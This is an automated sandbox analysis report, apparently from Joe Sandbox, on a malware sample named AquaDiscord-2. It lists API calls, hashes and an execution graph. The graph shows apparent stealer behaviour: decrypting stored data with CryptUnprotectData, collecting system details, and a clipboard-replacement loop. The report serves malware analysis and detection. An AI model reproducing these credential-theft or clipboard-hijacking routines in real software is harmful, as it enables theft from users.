                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6835e124cc65ba7e5d80b3c2c18035bbda44cd8e1453c64de71ce3cf316bb55b
                                                                                          • Instruction ID: 916b174fe6189bd1b685ae301bc70afe9defcf428cc7d4ec3a4279af3c0e8472
                                                                                          • Opcode Fuzzy Hash: 6835e124cc65ba7e5d80b3c2c18035bbda44cd8e1453c64de71ce3cf316bb55b
                                                                                          • Instruction Fuzzy Hash: EA21507160020EAFDB20FFF69E8197A7BAAAF443F47104514FA19D7550DB30EC509790
                                                                                          APIs
                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00B0C936
                                                                                            • Part of subcall function 00B057C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00B06F95,?,00000000,-00000008), ref: 00B05822
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B0C96E
                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B0C98E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 158306478-0
                                                                                          • Opcode ID: 337a185e047dc1804dd8b64c7b2bc2eb5383b09c7aac9d6499ea10c611702faa
                                                                                          • Instruction ID: c73987766b401bf1abbf4a480d231e53157856eb2db50644ecd2d27ff188fa3b
                                                                                          • Opcode Fuzzy Hash: 337a185e047dc1804dd8b64c7b2bc2eb5383b09c7aac9d6499ea10c611702faa
                                                                                          • Instruction Fuzzy Hash: E61161B2501619BFE62627B55CC9CBF6EDCDE853D47A046A9F80292181FF21CD0099B5
                                                                                          APIs
                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00B1399F,00000000,00000001,?,?,?,00B0DB00,?,00000000,00000000), ref: 00B14467
                                                                                          • GetLastError.KERNEL32(?,00B1399F,00000000,00000001,?,?,?,00B0DB00,?,00000000,00000000,?,?,?,00B0D446,?), ref: 00B14473
                                                                                            • Part of subcall function 00B144D0: CloseHandle.KERNEL32(FFFFFFFE,00B14483,?,00B1399F,00000000,00000001,?,?,?,00B0DB00,?,00000000,00000000,?,?), ref: 00B144E0
                                                                                          • ___initconout.LIBCMT ref: 00B14483
                                                                                            • Part of subcall function 00B144A5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B14441,00B1398C,?,?,00B0DB00,?,00000000,00000000,?), ref: 00B144B8
                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00B1399F,00000000,00000001,?,?,?,00B0DB00,?,00000000,00000000,?), ref: 00B14498
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                          • String ID:
                                                                                          • API String ID: 2744216297-0
                                                                                          • Opcode ID: fe0be8fdacf1e513f48f815fbfc397f627ebb7a2ddcc82949d6968ae1e2fdfa1
                                                                                          • Instruction ID: 3881f1f9b08458202e988c9c8ec0a829bb682476ac67ed7b5c5875da3e5a9419
                                                                                          • Opcode Fuzzy Hash: fe0be8fdacf1e513f48f815fbfc397f627ebb7a2ddcc82949d6968ae1e2fdfa1
                                                                                          • Instruction Fuzzy Hash: 49F03036400218BBCF221F95EC48AD93F66FB493F0F918450FE1996230CF32C8609B90
                                                                                          APIs
                                                                                            • Part of subcall function 00B0590A: GetLastError.KERNEL32(00000000,?,00B07C8D), ref: 00B0590E
                                                                                            • Part of subcall function 00B0590A: SetLastError.KERNEL32(00000000,?,?,00000028,00B01F53), ref: 00B059B0
                                                                                          • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00AFF7C9,?,?,?,00000055,?,-00000050,?,?,?), ref: 00B0A1A5
                                                                                          • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00AFF7C9,?,?,?,00000055,?,-00000050,?,?), ref: 00B0A1DC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CodePageValid
                                                                                          • String ID: utf8
                                                                                          • API String ID: 943130320-905460609
                                                                                          • Opcode ID: d58f0bad498177a924ea9f95bc2f6b43bad341f97fbef4510a72fa6b1fbce4bb
                                                                                          • Instruction ID: f20d2147c035f82f20225f5b8044f99492cd91f9f33da19ea381339470c2505d
                                                                                          • Opcode Fuzzy Hash: d58f0bad498177a924ea9f95bc2f6b43bad341f97fbef4510a72fa6b1fbce4bb
                                                                                          • Instruction Fuzzy Hash: C9511731600305AAEB25AB748C82BB67BE8EF05740F144CE9FA55AB4C1FB71D94497A3
                                                                                          APIs
                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00B05031,?,?,00000000,00000000,00000000,?), ref: 00B05155
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: EncodePointer
                                                                                          • String ID: MOC$RCC
                                                                                          • API String ID: 2118026453-2084237596
                                                                                          • Opcode ID: 1a3d04abb828008be788469bbf73d7d969478061ff009953401a3c86d0799b69
                                                                                          • Instruction ID: 5594469fdb53435593e1ec1433ae6bd53db010139f6207031f600fcde7d390b7
                                                                                          • Opcode Fuzzy Hash: 1a3d04abb828008be788469bbf73d7d969478061ff009953401a3c86d0799b69
                                                                                          • Instruction Fuzzy Hash: BB415871900609AFCF25DF98CD81AEEBBB5FF48300F148099FA09A72A1D735AA51DF50
                                                                                          APIs
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00B04C13
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1670709457.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1670688721.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670737133.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670755382.0000000000B20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670770681.0000000000B21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670787828.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1670804581.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___except_validate_context_record
                                                                                          • String ID: csm$csm
                                                                                          • API String ID: 3493665558-3733052814
                                                                                          • Opcode ID: 2bc179bff8e76723036f57f9e75cd380d96e0ee420206c1324eb2164604c59ef
                                                                                          • Instruction ID: 9c21f47b4521cf6fd5cd48e141b51566248c5d31cfe6458a1828a2eb03694dcd
                                                                                          • Opcode Fuzzy Hash: 2bc179bff8e76723036f57f9e75cd380d96e0ee420206c1324eb2164604c59ef
                                                                                          • Instruction Fuzzy Hash: 5131E1B2401219ABDF369F50C8449AE7FE5FF09315B1882EAFF544A1A1C332CCA1DB91

                                                                                          Execution Graph

                                                                                          Execution Coverage:5.8%
                                                                                          Dynamic/Decrypted Code Coverage:4.4%
                                                                                          Signature Coverage:48.3%
                                                                                          Total number of Nodes:362
                                                                                          Total number of Limit Nodes:34
                                                                                          execution_graph 31456 42f100 CoSetProxyBlanket 31087 40cec7 31088 40cef0 31087->31088 31091 439b30 31088->31091 31090 40d01a 31090->31090 31092 439b60 31091->31092 31092->31092 31093 439c9b CoCreateInstance 31092->31093 31094 439cfb SysAllocString 31093->31094 31095 43a1f9 31093->31095 31098 439d6f 31094->31098 31096 43a209 GetVolumeInformationW 31095->31096 31106 43a220 31096->31106 31099 43a1e5 SysFreeString 31098->31099 31100 439d7e CoSetProxyBlanket 31098->31100 31099->31095 31101 43a1db 31100->31101 31102 439d9e SysAllocString 31100->31102 31101->31099 31104 439e80 31102->31104 31104->31104 31105 439e96 SysAllocString 31104->31105 31109 439ebc 31105->31109 31106->31090 31107 43a1bf SysFreeString SysFreeString 31107->31101 31108 43a1b5 31108->31107 31109->31107 31109->31108 31110 439f00 VariantInit 31109->31110 31112 439f50 31110->31112 31111 43a1a4 VariantClear 31111->31108 31112->31111 31113 40d54c 31114 40d560 31113->31114 31117 40d5b8 31114->31117 31230 43eec0 LdrInitializeThunk 31114->31230 31115 40d63e 31135 422f70 31115->31135 31117->31115 31231 43eec0 LdrInitializeThunk 31117->31231 31120 40d67d 31151 4237c0 31120->31151 31122 40d69d 31164 423ae0 31122->31164 31124 40d6bd 31177 4262a0 31124->31177 31126 40d6dd 31192 426b80 31126->31192 31130 40d6ef 31206 429df0 31130->31206 31132 40d6f8 31232 434280 6 API calls 31132->31232 31134 40d741 31136 422fd0 31135->31136 31136->31136 31137 42300d RtlExpandEnvironmentStrings 31136->31137 31139 423060 31137->31139 31138 423109 31138->31120 31139->31138 31142 4230e3 RtlExpandEnvironmentStrings 31139->31142 31145 423127 31139->31145 31147 423241 31139->31147 31148 423376 31139->31148 31140 423507 31140->31140 31141 42362c 31140->31141 31237 420dd0 31140->31237 31141->31141 31142->31138 31142->31145 31142->31147 31142->31148 31144 4234f1 GetLogicalDrives 31150 441f50 LdrInitializeThunk 31144->31150 31145->31145 31146 441f50 LdrInitializeThunk 31145->31146 31146->31147 31147->31147 31233 441f50 31147->31233 31148->31140 31148->31141 31148->31144 31148->31148 31150->31140 31152 423860 31151->31152 31152->31152 31153 4238cc RtlExpandEnvironmentStrings 31152->31153 31156 423920 31153->31156 31155 423a9f 31155->31122 31156->31155 31157 4239d2 31156->31157 31159 423c93 31156->31159 31161 4239b1 RtlExpandEnvironmentStrings 31156->31161 31263 4412b0 RtlFreeHeap LdrInitializeThunk 31156->31263 31262 41ead0 RtlFreeHeap LdrInitializeThunk 31157->31262 31264 440fd0 31159->31264 31161->31155 31161->31156 31161->31157 31161->31159 31165 423aee 31164->31165 31166 440ed0 LdrInitializeThunk 31165->31166 31168 423992 31166->31168 31169 423a9f 31168->31169 31170 423c93 31168->31170 31171 4239d2 31168->31171 31175 4239b1 RtlExpandEnvironmentStrings 31168->31175 31280 4412b0 RtlFreeHeap LdrInitializeThunk 31168->31280 31169->31124 31173 440fd0 2 API calls 31170->31173 31279 41ead0 RtlFreeHeap LdrInitializeThunk 31171->31279 31174 423cc7 31173->31174 31174->31169 31176 440ed0 LdrInitializeThunk 31174->31176 31175->31168 31175->31169 31175->31170 31175->31171 31176->31169 31178 4264ed 31177->31178 31179 4264ce 31177->31179 31181 4262cc 31177->31181 31185 426510 31177->31185 31187 4264fc 31177->31187 31178->31185 31178->31187 31190 4266f2 31178->31190 31281 43ee40 31178->31281 31296 4412b0 RtlFreeHeap LdrInitializeThunk 31179->31296 31181->31178 31181->31179 31181->31181 31183 440ed0 LdrInitializeThunk 31181->31183 31181->31185 31181->31187 31181->31190 31183->31181 31184 440ed0 LdrInitializeThunk 31184->31187 31185->31126 31185->31185 31187->31184 31187->31185 31189 440fd0 2 API calls 31187->31189 31187->31190 31288 441900 31187->31288 31298 43eec0 LdrInitializeThunk 31187->31298 31189->31187 31190->31185 31297 43eec0 LdrInitializeThunk 31190->31297 31193 426bb0 31192->31193 31196 426c1e 31193->31196 31301 43eec0 LdrInitializeThunk 31193->31301 31194 40d6e6 31200 427030 31194->31200 31196->31194 31199 426d0e 31196->31199 31302 43eec0 LdrInitializeThunk 31196->31302 31197 43d010 RtlFreeHeap 31197->31194 31199->31197 31303 427050 RtlFreeHeap LdrInitializeThunk 31200->31303 31202 427044 31202->31130 31203 427039 31203->31202 31304 43aae0 RtlFreeHeap LdrInitializeThunk 31203->31304 31205 42781d 31205->31130 31207 429e80 31206->31207 31207->31207 31208 429f35 RtlExpandEnvironmentStrings 31207->31208 31213 429f80 31208->31213 31209 42a32e 31220 42a376 31209->31220 31221 42a642 31209->31221 31229 42a008 31209->31229 31312 4420d0 LdrInitializeThunk 31209->31312 31210 42a02f 31215 441dd0 LdrInitializeThunk 31210->31215 31211 42a043 31211->31209 31212 42a06a 31211->31212 31223 42a0a3 31211->31223 31211->31229 31305 4420d0 LdrInitializeThunk 31211->31305 31212->31209 31212->31223 31212->31229 31306 442190 31212->31306 31213->31209 31213->31210 31213->31211 31213->31212 31219 429fe9 RtlExpandEnvironmentStrings 31213->31219 31213->31223 31213->31229 31215->31211 31217 42a355 31217->31220 31217->31221 31217->31229 31219->31209 31219->31210 31219->31211 31219->31212 31219->31223 31219->31229 31222 442190 LdrInitializeThunk 31220->31222 31313 43eec0 LdrInitializeThunk 31221->31313 31222->31220 31223->31209 31223->31220 31223->31221 31224 42a6eb 31223->31224 31226 441dd0 LdrInitializeThunk 31223->31226 31223->31229 31314 43eec0 LdrInitializeThunk 31224->31314 31226->31209 31228 42a708 31229->31132 31230->31117 31231->31115 31232->31134 31235 441f70 31233->31235 31234 44207e 31234->31147 31235->31234 31249 43eec0 LdrInitializeThunk 31235->31249 31250 441dd0 31237->31250 31239 42150b 31239->31141 31241 420fae 31243 43d010 RtlFreeHeap 31241->31243 31242 420e1a 31242->31239 31246 420ecf 31242->31246 31254 43eec0 LdrInitializeThunk 31242->31254 31244 4214a6 31243->31244 31244->31239 31260 43eec0 LdrInitializeThunk 31244->31260 31246->31241 31255 43eec0 LdrInitializeThunk 31246->31255 31256 43d010 31246->31256 31249->31234 31251 441df0 31250->31251 31252 441efe 31251->31252 31261 43eec0 LdrInitializeThunk 31251->31261 31252->31242 31254->31242 31255->31246 31257 43d023 31256->31257 31258 43d025 31256->31258 31259 43d03b RtlFreeHeap 31256->31259 31257->31246 31258->31259 31259->31246 31260->31244 31261->31252 31262->31155 31263->31156 31265 440ff0 31264->31265 31268 441048 31265->31268 31276 43eec0 LdrInitializeThunk 31265->31276 31266 423cc7 31266->31155 31272 440ed0 31266->31272 31268->31266 31271 44115f 31268->31271 31277 43eec0 LdrInitializeThunk 31268->31277 31269 43d010 RtlFreeHeap 31269->31266 31271->31269 31271->31271 31274 440ef0 31272->31274 31273 440f9f 31273->31155 31274->31273 31278 43eec0 LdrInitializeThunk 31274->31278 31276->31268 31277->31271 31278->31273 31279->31169 31280->31168 31282 43ee93 31281->31282 31283 43ee60 31281->31283 31285 43ee74 31281->31285 31287 43ee88 31281->31287 31284 43d010 RtlFreeHeap 31282->31284 31283->31282 31283->31285 31283->31287 31284->31287 31286 43ee79 RtlReAllocateHeap 31285->31286 31286->31287 31287->31187 31289 44190f 31288->31289 31292 441a2e 31289->31292 31299 43eec0 LdrInitializeThunk 31289->31299 31290 441c0f 31290->31187 31292->31290 31295 441b4e 31292->31295 31300 43eec0 LdrInitializeThunk 31292->31300 31293 43d010 RtlFreeHeap 31293->31290 31295->31293 31296->31178 31297->31185 31298->31187 31299->31292 31300->31295 31301->31196 31302->31199 31303->31203 31304->31205 31305->31212 31307 4421b0 31306->31307 31310 4421fe 31307->31310 31315 43eec0 LdrInitializeThunk 31307->31315 31309 44229e 31309->31223 31310->31309 31316 43eec0 LdrInitializeThunk 31310->31316 31312->31217 31313->31224 31314->31228 31315->31310 31316->31309 31317 43d050 31318 43d080 31317->31318 31321 43d0fe 31318->31321 31325 43eec0 LdrInitializeThunk 31318->31325 31319 43d301 31321->31319 31324 43d20e 31321->31324 31326 43eec0 LdrInitializeThunk 31321->31326 31322 43d010 RtlFreeHeap 31322->31319 31324->31322 31325->31321 31326->31324 31327 5141000 31328 5141102 31327->31328 31329 5141012 31327->31329 31330 5141030 Sleep 31329->31330 31331 514103a OpenClipboard 31329->31331 31330->31329 31332 51410f9 GetClipboardSequenceNumber 31331->31332 31333 514104a GetClipboardData 31331->31333 31332->31329 31334 51410f3 CloseClipboard 31333->31334 31335 514105a GlobalLock 31333->31335 31334->31332 31335->31334 31336 514106b GlobalAlloc 31335->31336 31338 514109d GlobalLock 31336->31338 31339 51410e9 GlobalUnlock 31336->31339 31340 51410b0 31338->31340 31339->31334 31341 51410b9 GlobalUnlock 31340->31341 31342 51410e0 GlobalFree 31341->31342 31343 51410cb EmptyClipboard SetClipboardData 31341->31343 31342->31339 31343->31339 31343->31342 31344 40ffd6 31346 40fff0 31344->31346 31345 40e4da 31346->31345 31347 410333 RtlExpandEnvironmentStrings 31346->31347 31349 4103a6 31347->31349 31349->31345 31350 414930 31349->31350 31351 414950 31350->31351 31351->31351 31352 441dd0 LdrInitializeThunk 31351->31352 31355 414a81 31352->31355 31353 414a90 31353->31345 31355->31353 31356 4420d0 LdrInitializeThunk 31355->31356 31356->31355 31357 43f0d4 31358 43f0de 31357->31358 31360 43f1ce 31358->31360 31361 43eec0 LdrInitializeThunk 31358->31361 31361->31360 31457 42d41a 31458 42d426 GetComputerNameExA 31457->31458 31362 40d75b 31367 434460 31362->31367 31364 40d761 31365 40d770 CoUninitialize 31364->31365 31366 40d790 31365->31366 31368 434495 GetSystemMetrics GetSystemMetrics 31367->31368 31369 4344d8 31368->31369 31460 414a9a 31461 414a9f 31460->31461 31461->31461 31462 441dd0 LdrInitializeThunk 31461->31462 31463 414c4d 31462->31463 31464 414c97 31463->31464 31477 414c5c 31463->31477 31478 414cd5 31463->31478 31490 4420d0 LdrInitializeThunk 31463->31490 31466 442190 LdrInitializeThunk 31464->31466 31464->31478 31466->31478 31468 4150c3 31469 415351 31468->31469 31472 4151bb 31468->31472 31487 41536b 31468->31487 31493 4191c0 FreeLibrary FreeLibrary RtlFreeHeap LdrInitializeThunk 31469->31493 31471 415356 31480 4156aa 31471->31480 31471->31487 31473 415288 31472->31473 31476 4155ab 31472->31476 31472->31477 31472->31487 31492 41bdd0 RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 31473->31492 31475 415099 CryptUnprotectData 31475->31468 31475->31478 31494 41bdd0 RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 31476->31494 31478->31468 31478->31475 31491 43eec0 LdrInitializeThunk 31478->31491 31489 415782 31480->31489 31495 43eec0 LdrInitializeThunk 31480->31495 31481 415bcd 31486 415f76 31481->31486 31497 43eec0 LdrInitializeThunk 31481->31497 31484 4166ff 31486->31486 31487->31476 31487->31477 31488 441f50 LdrInitializeThunk 31487->31488 31488->31487 31489->31481 31489->31486 31496 43eec0 LdrInitializeThunk 31489->31496 31490->31464 31491->31478 31492->31477 31493->31471 31494->31477 31495->31489 31496->31481 31497->31484 31498 436c9e 31501 436cce 31498->31501 31499 436d12 31501->31499 31502 43eec0 LdrInitializeThunk 31501->31502 31502->31501 31503 40d49d 31504 40d4b0 31503->31504 31505 40d4f3 31504->31505 31507 43eec0 LdrInitializeThunk 31504->31507 31507->31505 31370 43f5dd 31371 43f600 31370->31371 31372 43f682 31371->31372 31377 43eec0 LdrInitializeThunk 31371->31377 31376 43eec0 LdrInitializeThunk 31372->31376 31375 43f901 31376->31375 31377->31372 31508 42da21 31509 42da50 31508->31509 31509->31509 31510 42df17 GetPhysicallyInstalledSystemMemory 31509->31510 31511 42df40 31510->31511 31511->31511 31378 43faeb GetForegroundWindow 31382 440e80 31378->31382 31380 43faf9 GetForegroundWindow 31381 43fb0a 31380->31381 31383 440e90 31382->31383 31383->31380 31513 42bf2d 31514 42bf38 31513->31514 31518 439800 31514->31518 31516 42bf46 31517 439800 LdrInitializeThunk 31516->31517 31517->31516 31519 439825 31518->31519 31521 4398ed 31519->31521 31527 43eec0 LdrInitializeThunk 31519->31527 31523 4399cf 31521->31523 31525 439ac9 31521->31525 31526 43eec0 LdrInitializeThunk 31521->31526 31523->31525 31528 43eec0 LdrInitializeThunk 31523->31528 31525->31516 31526->31521 31527->31519 31528->31523 31529 4087b0 31531 4087bf 31529->31531 31530 408a4f ExitProcess 31531->31530 31532 4087d4 GetCurrentProcessId GetCurrentThreadId 31531->31532 31533 408a41 31531->31533 31535 4087fa 31532->31535 31536 4087fe SHGetSpecialFolderPathW 31532->31536 31545 43ee20 FreeLibrary 31533->31545 31535->31536 31537 408930 31536->31537 31538 4089b6 GetForegroundWindow 31537->31538 31540 4089cb 31538->31540 31539 408a38 31539->31533 31540->31539 31544 40c880 CoInitializeEx 31540->31544 31545->31530 31384 4206f0 31385 420704 31384->31385 31389 420811 31384->31389 31390 420830 31385->31390 31391 420840 31390->31391 31392 441f50 LdrInitializeThunk 31391->31392 31393 42094f 31392->31393 31394 43cff0 31397 440630 31394->31397 31398 43cff5 RtlAllocateHeap 31397->31398 31546 40c8b3 CoInitializeSecurity 31399 438974 31400 438979 31399->31400 31401 4389a4 GetUserDefaultUILanguage 31400->31401 31402 4389d3 31401->31402 31408 40dd7a 31409 40dd82 31408->31409 31412 411920 31409->31412 31411 40dd8f 31417 411939 31412->31417 31413 411940 31413->31411 31414 411ec3 RtlExpandEnvironmentStrings 31414->31417 31415 4133c1 CreateThread 31415->31417 31416 412198 RtlExpandEnvironmentStrings 31416->31417 31417->31413 31417->31414 31417->31415 31417->31416 31418 411fb4 RtlExpandEnvironmentStrings 31417->31418 31419 41237d RtlExpandEnvironmentStrings 31417->31419 31420 43eec0 LdrInitializeThunk 31417->31420 31423 43d010 RtlFreeHeap 31417->31423 31424 441c20 LdrInitializeThunk 31417->31424 31425 4422f0 LdrInitializeThunk 31417->31425 31418->31417 31419->31417 31420->31417 31423->31417 31424->31417 31425->31417 31426 42d2ff 31428 42d313 31426->31428 31427 42d37b GetComputerNameExA 31428->31427 31428->31428 31429 42207d 31430 422094 31429->31430 31441 422167 31429->31441 31433 422162 31430->31433 31452 43eec0 LdrInitializeThunk 31430->31452 31432 4226eb 31436 422e34 31432->31436 31440 4228bf 31432->31440 31432->31441 31444 423127 31432->31444 31455 43eec0 LdrInitializeThunk 31432->31455 31433->31432 31434 422e0f 31433->31434 31433->31441 31454 43eec0 LdrInitializeThunk 31434->31454 31437 4230e3 RtlExpandEnvironmentStrings 31436->31437 31437->31441 31437->31444 31447 423241 31437->31447 31448 423376 31437->31448 31439 423507 31443 420dd0 2 API calls 31439->31443 31451 42362c 31439->31451 31440->31441 31453 43eec0 LdrInitializeThunk 31440->31453 31443->31451 31444->31444 31445 441f50 LdrInitializeThunk 31444->31445 31445->31447 31446 4234f1 GetLogicalDrives 31449 441f50 LdrInitializeThunk 31446->31449 31447->31447 31450 441f50 LdrInitializeThunk 31447->31450 31448->31439 31448->31446 31448->31448 31448->31451 31449->31439 31450->31447 31452->31433 31453->31441 31454->31436 31455->31432
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $"$#$$$%$&$&$'$($)$*$*$,$-$/$0$1$3$4$6$8$9$9$<$=$>$A$B$C$D$D$D$E$G$H$K$M$N$O$S$X$Y$Z$[$_$`$f$p$r$t$u$v$x$|
                                                                                          • API String ID: 0-842215263
                                                                                          • Opcode ID: e1db05eb6b877458662798f7b77d9f674f87e06c784e635f8a94fdc96650a68d
                                                                                          • Instruction ID: 919045ca250a3dc522ea085bcacde565848991d1b776b7806181371f3fd81d75
                                                                                          • Opcode Fuzzy Hash: e1db05eb6b877458662798f7b77d9f674f87e06c784e635f8a94fdc96650a68d
                                                                                          • Instruction Fuzzy Hash: C203BD3150C7C18AC3359B3885443DFBFE1AB96324F188A6EE4E9873D2D6788586C75B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 50;>$>89>$KiY]$Ovxu$U^nl$V$[W:($bYbU$rpLA$wOGH$|W:($L4$L4
                                                                                          • API String ID: 0-291379916
                                                                                          • Opcode ID: 708b374310dfa8033e766b2e8d36929ad886bd4ce37cf35e25c25107b4ef0a77
                                                                                          • Instruction ID: 65dbaec70bbc84fecd4f702046f7613bdab94853883533c89d79ffcbef30d949
                                                                                          • Opcode Fuzzy Hash: 708b374310dfa8033e766b2e8d36929ad886bd4ce37cf35e25c25107b4ef0a77
                                                                                          • Instruction Fuzzy Hash: DDA24976A083518BD724CF25D8917EFB7E2EBC5314F08893EE49987392E7389845C786

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
